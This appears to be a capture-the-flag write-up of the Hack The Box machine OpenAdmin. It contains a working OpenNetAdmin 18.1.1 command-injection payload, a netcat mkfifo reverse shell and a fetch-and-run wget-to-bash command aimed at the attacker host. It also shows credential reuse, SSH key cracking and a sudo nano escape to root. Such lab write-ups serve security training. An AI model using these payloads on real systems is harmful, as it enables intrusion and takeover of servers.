In this post we will talk about the OpenAdmin, the third challenge for the HTB Track “Intro to Dante”.
TL:DR
The Attack Kill chain/Steps can be mapped to:
- Recon and Enumeration (HTTP and SSH services)
- Enumeration against Web Service at 80/TCP
- Initial Compromise by exploring an Remote Command Execution against OpenNetAdmin v18.1.1
- Recon and Enumeration
- Mysql Credentials in clear text
- Lateralization from www-data to jimmy by Password Reause
- Lateralization from jimmy to joanna by abuse miss configuration in apache2 internal environment
- Dictionary attack to crack encrypted joanna ssh key
- Privilge Escalation to root by abusing privilege elevation mechanisms (sudo)
Reconnaissance and Enumeration
During the reconnaissance with nmap the attacker identified the open ports 22/TCP and 80/TCP.
Web Services – 80/TCP
Directory Enumeration and Brute Force
In order to discovery directories in the target HTTP service, the attacker managed to use dirsearch to perform Web Discovery based on directory brute forcing.
dirsearch --url 'http://10.10.10.171/' -w /opt/SecLists/Discovery/Web-Content/big.txt -e ? --plain-text-report=openadmin-http-80-dirsearch-big.out -r -t 32 -R 3 
Almost all checked directories at this point are some king of rabbit roles. Based on that, the attacker failback to enumeration again using anther’s wordlists but the same results are obtained.
When the same procedure as performed using the dirbuster and the wordlist directory-list-2.3-medium.txt , the directory ONA appears.
Investigating this anomaly and because the fact the word ONA does not exist on the wordlist used, was been identified that the Dirbuster performs URL Crawling, in another words, dirbuster is capable of get new urls based on HTML elements.
Checking my tools, I discovery that my current version of Gobuster and dirsearch does not perform crawling, normally I use Burp-Profession Discovery(which have Crawling features) for pentesting web applications along with my tools, this time I dont consider opens my burp (u know, java is way too heavyy) and this causes me a time lost.
So, based on the dirbuster output, i managed to find the reference to the /ONA directory inside the page at URL: http://10.10.10.171/music/ at the login button
Probably this referenced is made in others file, at first moment and until now I don’t check all the directory and pages for lazy reasons, but this is a important tip we must not forget, don’t fuck the methodology by leaving step behinds.
OpenNetAdmin HTTP
The ONA directory reveals the application called OpenNetAdmin at version 18.1.1
Initial Compromise – OpenNetAdmin 18.1.1 – Remote Code Execution
The previously identified ONA application at URL http://10.10.10.171/ona at version 1 18.1.1 has an RCE vulnerability available.
To confirm the RCE vulnerability, the attacker executes remote command execution using id command.
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";id;echo \"END\"&xajaxargs[]=ping" "http://10.10.10.171/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
The command ID reveals privileges of user UID-33 (www-data).
To available the delivery strategy, the attacker checks the existence of the CURL command on target machine using the RCE vulnerability again.
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";id;echo \"END\"&xajaxargs[]=ping" "http://10.10.10.171/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
In order to exploit the RCE Vulnerability, the attacker create a local file called shell to be delivered to attacker machine at the moment of remote command execution to downloads and executes the content of this file. The malicious file contains shellscript instructions to uses mkfifo, netcat and I/O Stream to perform a call back to attacker machine and spawn a reverse shell.
cat shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 443 >/tmp/fThe Shell file was been delivered over HTTP service provided by HTTP.Server from Python3 at attacker machine.
sudo python3 -m HTTP.ServerAt this time, the attacker start a handler to receive the connection using netcat.
nc -tvlp 443In order to trigged the attack, the RCE vulnerability is abused once again, this time, to obtain the reverse shell by downloading the shell file from attacker machine from the target machine and executing its content.
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";wget http://10.10.14.4/shell -O - | bash;echo \"END\"&xajaxargs[]=ping" "http://10.10.10.171/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1When the curl command is executed, the handler on attacker machine receives the reverse shell at port 443/TCP under www-data privileges
Privilege Escalation (www-data to Jimmy)
While performing recon and enumeration against the systems, the attacker found the credentials used in the application to connect to the mysql at file /opt/ona/www/local/config/database_settings.inc.php
To enumerate users, the attacker performs the linux command getent followed by the parameter passwd
getent $ getent passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bashBy Password Reusing, the attacker obtain sucess to authenticate with jimmy user over SSH (and local with su – jimmy on a tty shell) with the mysql password n1nj4W4rri0R!.
Lateralization to Joanna
Under Jimmy privileges, the attacker identify an dangerous feature at file /var/www/internal/main.php
The file /etc/apache2/sites-available/internal.conf reveals which internal website run over joanna privileges and not by default privileges as www-data.
So, based on the shell_exec from main.php file, the attacker was able to obtain the encrypted private key (id_rsa) from joanna user.
At this point, the option here is bruteforce the encrypted RSA key using the previosly hint from main.php file which says:
Don’t forget your “ninja” password
Hint from main.php
The logical procedure is get an wordlist like rockyou.txt and filter for strings with ‘ninja’, then performs the bruteforce. But, at this point, maybe for lazy reasons, I just replace shell_exec content with reverse shelll instructions, almost the same as before.
To executes the main.php, the attacker performs the same previously executed curl command. Once executed, the reverse shell is received in the attacker handler, previously started at port 444/TCP. The session from the reverse shell is under joanna privileges.
Compromising User flag
With joanna privileges, the attacker was able to compromise the user flag available at file /home/joanna/user.txt.
Privilege Escalation – Joanna to Root
In order to crack the encryption from the id_rsa key previosly founded, the attacker generates a wordlist based on the string ninja using the rockyou as a source.
Converting the key to john using ssh2john (https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py)
python ssh2john.py sshkey > id_rsa-joanna.john
To perform the dict attack, the file id_rsa-joanna.john was passed to John with the previously created wordlist. The procedure reveals the password bloodninjas.
With an TTY shell under joanna privileges, the attacker was able to list the capabilities of privileges elevation provided by sudo mechanism and has identified permission to execute nano under root privileges without password.
To escape Nano and Spawn a shell, the attacker perform the first procedure documented at GTFOBINS (https://gtfobins.github.io/gtfobins/nano/) to escape Nano.
sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0
Compromising Root flag
With the shell under root privileges, the attacker compromise the root flag .
Considerations
Classic Linux box, remembers me about don’t get fuck by fucking the methodology.
First time I played, at the joanna privlege escalation to root, I was able to executes the sudo -l command inside a reverse shell to list which commands I can perform with sudo and worked. When I back to write the writeup and decide to collect some evidences, trying to reproduce this step, dont work anymore for unknow reason.
I check some few stuffs to try to identify wtf is goin on, I check enviroment variables, load the .profile and etc but nothing . Off course, furthers investigations can identify the problem and solution, but i will leave this topic open by now due to time limtations.
References
- gtfobins Nano: https://gtfobins.github.io/gtfobins/nano/
- dirbuster: https://tools.kali.org/web-applications/dirbuster
- OpenNetAdmin 18.1.1 – Remote Code Execution: https://www.exploit-db.com/exploits/47691
Computer Addicted 
One thought on “WriteUp: Intro to Dante – OpenAdmin 3/6”